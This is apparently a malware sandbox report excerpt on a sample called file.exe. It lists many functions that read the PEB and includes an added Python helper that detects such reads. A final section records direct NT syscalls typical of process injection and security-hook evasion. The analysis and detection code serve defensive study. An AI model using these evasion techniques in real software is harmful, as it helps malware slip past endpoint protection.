                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE75D mov eax, dword ptr fs:[00000030h]3_2_00FCE75D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40750 mov eax, dword ptr fs:[00000030h]3_2_00F40750
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82750 mov eax, dword ptr fs:[00000030h]3_2_00F82750
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F82750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7674D mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7674D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7674D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7273C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7273C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FBC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F70710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F6E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01014940 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD6870 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCE872 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F70854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F44859 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F44859 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F52840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FE483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FE483A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0100A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F729F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F729F9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F749D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC89B3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F529A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F409AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F409AD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FE4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FE4978 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F66962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F8096E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F8096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F8096E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_010108C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FC892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0100A8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F38918 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F38918 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FBE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FBE908 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01014B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F74AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F74AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01008B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01008B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F96ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0100AB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F48AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F48AA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01012B57 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F96AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F78A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F4EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FBCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FBCA72 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7CA6F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FEEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F46A50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F50A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F50A5B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F64A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F64A35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F6EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCCA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F48BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F6EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FCCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FEEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F40BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F60BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F50BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F50BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_01014A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F3CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F38B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FEEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FF4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FF4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FE8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00FD6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard
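The "mov <reg>, dword ptr fs:[00000030h]" entries above are the evidence behind the "Contains functionality to read the PEB" signature: fs:[0x30] is the PEB pointer in the 32-bit TEB. The following is an added example, not Joe Sandbox code and not part of the original report: it parses those entries to see which functions load the PEB pointer and into which register, derives the exact byte encodings an analyst would put into a YARA or scanner rule, and runs them over a constructed byte buffer. The sample lines are copied from the report (normalised to "Source: <file> | Code function: <id> <instruction>"); the byte buffer is constructed and is not from the sample.

```python
"""Triage helper for the 'read the PEB' evidence above.

Added example for this report page; the parser and the byte-pattern encoder
are mine, not Joe Sandbox tooling.  Sample lines are copied from the report
(normalised to 'Source: <file> | Code function: <id> <instruction>'); the
byte buffer is constructed to look like a typical PEB walk.
"""
import re
from collections import defaultdict

# Constructed sample: five evidence lines from the report above.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F82750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7674D mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7674D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F7273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00F8096E mov edx, dword ptr fs:[00000030h]
"""

# Accepts the normalised form and the raw HTML-to-text form, in which the
# source path runs straight into "Code function:", the function id is
# repeated after the instruction and a "Jump to behavior" link trails.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<fn>\d+_\d+_[0-9A-Fa-f]{8})\s+(?P<insn>.+?)"
    r"(?:\s*(?P=fn))?(?:\s*Jump to behavior)?\s*$")
# mov <reg32>, dword ptr fs:[30h]: the PEB pointer load the signature keys on.
PEB_RE = re.compile(
    r"mov\s+(?P<reg>e(?:[a-d]x|[sd]i|[bs]p)),\s*dword ptr fs:\[0*30h\]", re.I)

def peb_readers(report_text):
    """Function id -> set of registers the PEB pointer is loaded into."""
    readers = defaultdict(set)
    for line in report_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and (p := PEB_RE.search(m["insn"])):
            readers[m["fn"]].add(p["reg"].lower())
    return dict(readers)

# ModRM reg field values for the 32-bit general registers.
REG_CODE = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3,
            "esp": 4, "ebp": 5, "esi": 6, "edi": 7}

def encodings(reg):
    """Byte sequences for `mov <reg>, dword ptr fs:[30h]` in 32-bit code.
    0x64 is the FS segment override.  eax has a short moffs32 form (A1 disp32)
    that assemblers prefer, so both forms are returned for it; every register
    can also be encoded as 8B /r with ModRM mod=00 rm=101 (absolute disp32)."""
    disp = (0x30).to_bytes(4, "little")
    generic = b"\x64\x8b" + bytes([(REG_CODE[reg.lower()] << 3) | 0b101]) + disp
    return [b"\x64\xa1" + disp, generic] if reg.lower() == "eax" else [generic]

def find_peb_reads(code):
    """Offsets of PEB pointer loads in a raw x86 byte buffer, as (offset, reg)."""
    hits = []
    for reg in REG_CODE:
        for pat in encodings(reg):
            pos = code.find(pat)
            while pos != -1:
                hits.append((pos, reg))
                pos = code.find(pat, pos + 1)
    return sorted(hits)

# Constructed buffer: a prologue, two PEB loads and the Ldr / BeingDebugged
# dereferences that commonly follow them (PEB+0x0C and PEB+0x02 on x86).
SAMPLE_CODE = (
    b"\x55\x8b\xec"                   # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"       # mov eax, dword ptr fs:[30h]   (PEB)
    b"\x8b\x40\x0c"                   # mov eax, [eax+0Ch]            (PEB->Ldr)
    b"\x64\x8b\x0d\x30\x00\x00\x00"   # mov ecx, dword ptr fs:[30h]   (PEB)
    b"\x0f\xb6\x41\x02"               # movzx eax, byte ptr [ecx+2]   (PEB->BeingDebugged)
    b"\x5d\xc3"                       # pop ebp; ret
)

if __name__ == "__main__":
    for fn, regs in sorted(peb_readers(SAMPLE_LINES).items()):
        print(fn, "->", ", ".join(sorted(regs)))
    for off, reg in find_peb_reads(SAMPLE_CODE):
        print(f"PEB pointer loaded into {reg} at offset {off:#x}")
```

Dozens of distinct functions reading the PEB, as listed above, is what you expect from statically linked runtime code as much as from anti-debug checks, so the per-function register summary is a triage aid, not a verdict; the byte patterns are what to carry into a rule.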

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtCreateMutant: Direct from: 0x774635CC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtMapViewOfSection: Direct from: 0x77462D1C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtResumeThread: Direct from: 0x774636AC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtSetInformationProcess: Direct from: 0x77462C5C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtSetInformationThread: Direct from: 0x774563F9
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQueryInformationProcess: Direct from: 0x77462C26
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtResumeThread: Direct from: 0x77462FBC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtReadFile: Direct from: 0x77462ADC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtDelayExecution: Direct from: 0x77462DDC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtAllocateVirtualMemory: Direct from: 0x77463C9C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtCreateUserProcess: Direct from: 0x7746371C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQuerySystemInformation: Direct from: 0x774648CC
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtCreateKey: Direct from: 0x77462C6C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtSetInformationThread: Direct from: 0x77462B4C
Source: C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
